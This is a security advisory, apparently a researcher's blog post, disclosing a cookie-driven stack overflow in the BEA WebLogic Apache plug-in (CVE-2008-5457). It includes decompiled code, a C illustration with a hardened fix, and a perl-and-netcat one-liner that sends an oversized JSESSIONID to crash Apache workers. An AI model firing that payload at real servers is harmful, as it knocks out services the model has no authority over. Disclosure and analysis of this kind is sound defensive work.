Sometimes you forget you reported a vulnerability. Especially when the vendor keeps sending you lots of messages that contain the following:

____________________________________________________

Reporter: Matt Watchinski ("Matt Watchinski" <mwatchinski@sourcefire.com>)
Organization: Sourcefire
____________________________________________________

Tracking #: 13175503
Description: BEA WEBLOGIC PLUG-IN FOR APACHE JSESSION COOKIE OVERFLOW
Status: Under investigation / Being fixed in main codeline

____________________________________________________
Reporter: Lurene Grenier ("Lurene Grenier" <lgrenier@sourcefire.com>)
Organization: Sourcefire
____________________________________________________

Eventually, you just create an email filter to ship them off somewhere, and review them every few weeks to make sure they don't say anything different. After a while I totally forgot about it, until I deleted the filter and a new one showed up in my inbox, which I responded to by asking when it would be fixed. To my surprise, the response I got back was that the January CPU 2009 update for Oracle fixed this problem.

Since this is now +60 days from some definition of Day 0, here are all the details.

Additionally, this has been detected by Snort/Sourcefire since 10/22/08 by SID 15010 GID 3

BEA WebLogic plug-in for Apache JSESSION Cookie overflow

Discovery Date:
10/20/08

Release Date:
1/13/09 - Oracle patched
3/27/09 - We noticed

Severity:
High

Vendor:
Oracle / BEA Weblogic

Systems Affected:
Apache plug-in http://download.oracle.com/otn/bea/weblogic/server103/WLSWebServerPlugins1.0.1150354-Apache.zip or below. This link is still on most of the BEA WebLogic pages. The only way to get the patch is with an Oracle Support account.

  • Apache plug-ins up to and including the ones released on October 14, 2008, which implies:
  • Oracle WebLogic Server 10.3
  • Oracle WebLogic Server 10.0 released through MP1
  • Oracle WebLogic Server 9.2 released through MP3
  • Oracle WebLogic Server 9.1
  • Oracle WebLogic Server 9.0
  • Oracle WebLogic Server 8.1 released through SP6
  • Oracle WebLogic Server 7.0 released through SP7
  • Oracle WebLogic Server 6.1 released through SP7

Overview:
A vulnerability exists in the parsing of the JSESSIONID cookie in the Apache Plug-in connector for BEA Weblogic that can result in a buffer overflow. This vulnerability may impact the availability, confidentiality or integrity of WebLogic Server applications which use the Apache web server configured with the WebLogic plug-in for Apache. This vulnerability may be remotely exploitable without authentication, i.e. it may be exploited over a network without the need for a username and password.

Technical Details:
The vulnerability is the result of an incorrectly bounded strncpy that uses the length of the cookie value, not the size of the destination buffer, as the amount of data to copy. Additionally, clustering must be enabled for this specific function to be reached.

MD5sum of plug-in used for testing this vulnerability:
db64bd7edabdd4712cb26e1f8675a9e0  mod_wl_22.so

Pseudocode of the vulnerability (decompiler output, reflowed; comments added):

    v8 = strchr(v6, 59);                              /* 59 == ';' : end of this cookie's value */
    if ( v7 == (const char *)v4 || (v9 = *(v7 - 1), v9 == 32) || v9 == 59 )   /* 32 == ' ' */
    {
      if ( v8 )
      {
        v12 = v8 - v7;                                /* length up to the next ';' */
      }
      else
      {
        v11 = v7;                                     /* no ';' found: v8 is NULL, so this      */
        v10 = -1;                                     /* inlined loop is strlen(v7), i.e. the   */
        do                                            /* rest of the header                     */
        {
          if ( !v10 )
            break;
          v50 = *v11++ == (_BYTE)v8;
          --v10;
        }
        while ( !v50 );
        v12 = ~v10 - 1;
      }
      strncpy(&ArgList, v7, v12);                     /* bound is the cookie length, not sizeof(ArgList) */
      sub_10009730(50, *(char **)(v2 + 1172), "Found cookie from cookie header: %s\n", &ArgList);
      break;
    }


As you can see, v7 and v8 are the beginning and end of the cookie value, and their difference, stored in v12, is the length of that value (when no ';' follows, the inlined strlen loop makes v12 the length of everything up to the end of the header). That length is what strncpy uses as its copy bound, but ArgList is a fixed-size buffer stored directly on the stack. If v8 - v7 is greater than the size of ArgList, strncpy writes past the end of it and the stack is overflowed; because the client supplies the cookie, it controls both the length and the contents of the overflow.
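To make the bug concrete, here is an added example in C (not the plug-in's code and not from the original post) that re-implements the cookie scan the decompilation shows, places the same source-bounded strncpy next to a copy whose bound comes from the destination, and measures how far a 9000-byte JSESSIONID would run past the buffer. The 8192-byte ArgList size, the function names and the sample headers are assumptions constructed for the example; the page only states that values above 8000 bytes crash the connector.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the plug-in's stack buffer (ArgList); the page gives no
 * figure, only that cookie values above 8000 bytes crash the connector. */
#define ARGLIST_SIZE 8192
char g_arglist[ARGLIST_SIZE];      /* destination used by main() and the checks */
size_t g_full_len;

/* Find the value of cookie `name` in a Cookie header using the rules visible
 * in the decompilation: the name must start the header or follow ' ' or ';',
 * and the value runs to the next ';' or, if none, to the end of the string
 * (the inlined strlen loop). Returns the value and its length, else NULL. */
const char *find_cookie_value(const char *header, const char *name, size_t *len)
{
    size_t nlen = strlen(name);
    const char *p = header;
    while ((p = strstr(p, name)) != NULL) {
        int at_boundary = (p == header) || p[-1] == ' ' || p[-1] == ';';
        if (at_boundary && p[nlen] == '=') {
            const char *val = p + nlen + 1;
            const char *end = strchr(val, ';');
            *len = end ? (size_t)(end - val) : strlen(val);
            return val;
        }
        p += nlen;
    }
    return NULL;
}

/* The vulnerable pattern: strncpy is bounded by the cookie's length rather
 * than sizeof(arglist), so a 9000-byte JSESSIONID runs off the stack buffer.
 * Shown for contrast; never call it on attacker-controlled input. */
void log_cookie_vulnerable(const char *header)
{
    char arglist[ARGLIST_SIZE];
    size_t len;
    const char *val = find_cookie_value(header, "JSESSIONID", &len);
    if (val == NULL)
        return;
    strncpy(arglist, val, len);           /* BUG: len is attacker controlled */
    printf("Found cookie from cookie header: %.*s\n", (int)len, arglist);
}

/* Bytes the vulnerable copy would write past a `dstsz`-byte buffer, counting
 * the terminator; 0 means the value fits. */
size_t overflow_bytes(const char *header, size_t dstsz)
{
    size_t len;
    if (find_cookie_value(header, "JSESSIONID", &len) == NULL)
        return 0;
    return len + 1 > dstsz ? len + 1 - dstsz : 0;
}

/* Hardened form: the bound is the destination size. The copy is truncated and
 * NUL-terminated, and *full_len reports the true length so the caller can
 * reject oversized ids instead of quietly using a prefix. Returns 1 if found. */
int copy_cookie_safe(char *dst, size_t dstsz, const char *header,
                     const char *name, size_t *full_len)
{
    size_t len;
    const char *val = find_cookie_value(header, name, &len);
    if (val == NULL || dstsz == 0)
        return 0;
    *full_len = len;
    if (len >= dstsz)
        len = dstsz - 1;                  /* leave room for '\0' */
    memcpy(dst, val, len);
    dst[len] = '\0';
    return 1;
}

/* Constructed input "<prefix><n x fill><suffix>" on the heap, e.g. the
 * advisory's 9000 'A's. Caller frees. */
char *build_cookie_header(const char *prefix, char fill, size_t n, const char *suffix)
{
    size_t plen = strlen(prefix), slen = strlen(suffix);
    char *h = malloc(plen + n + slen + 1);
    if (h == NULL)
        return NULL;
    memcpy(h, prefix, plen);
    memset(h + plen, fill, n);
    memcpy(h + plen + n, suffix, slen + 1);
    return h;
}

int main(void)
{
    char *hdr = build_cookie_header("JSESSIONID=", 'A', 9000, "; theme=dark");
    log_cookie_vulnerable("JSESSIONID=abc123; theme=dark");   /* short: fits */
    printf("9000-byte value overflows a %d-byte ArgList by %zu bytes\n",
           ARGLIST_SIZE, overflow_bytes(hdr, ARGLIST_SIZE));
    if (copy_cookie_safe(g_arglist, sizeof g_arglist, hdr, "JSESSIONID", &g_full_len))
        printf("safe copy kept %zu of %zu bytes\n", strlen(g_arglist), g_full_len);
    free(hdr);
    return 0;
}
```

With the assumed 8192-byte buffer, the advisory's 9000-byte value overruns it by 809 bytes, and a value of exactly 8192 bytes already spills the terminator, which is why the hardened copy clamps to dstsz - 1 rather than dstsz. Reporting the true length back to the caller matters too: a session id that needed truncating is not a valid session id and should be rejected, not forwarded to the cluster as a prefix.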

httpd.conf / Apache conf used to test this vulnerability (WebLogicCluster is the directive that enables the clustering path described above):

    MatchExpression *.*
    WebLogicCluster localhost:7001
    WebLogicHost localhost
    WebLogicPort 7001


Simple reproduction case:

Exploitation requires a JSESSIONID cookie value of more than 8000 bytes to trigger the overflow, with <host> being the Apache front end running the plug-in:

    perl -e 'print "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nCookie: JSESSIONID=" . "A"x9000 . "\r\n\r\n"' | nc <host> 80


This should cause the Apache child process running the connector to crash; the Apache parent process will then spawn a replacement child, so the service keeps answering but every such request kills a worker.

Metasploit 3.0 reproduction case:
Added to svn

Vendor Status:
Reported to Oracle on 10/22/08
Patched by Oracle on 01/13/09

Credit:
* Matthew Watchinski - Sr. Director Sourcefire Vulnerability Research Team (VRT)
* Lurene Grenier - Analyst Team Lead, Sourcefire VRT

References:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

CVE-2008-5457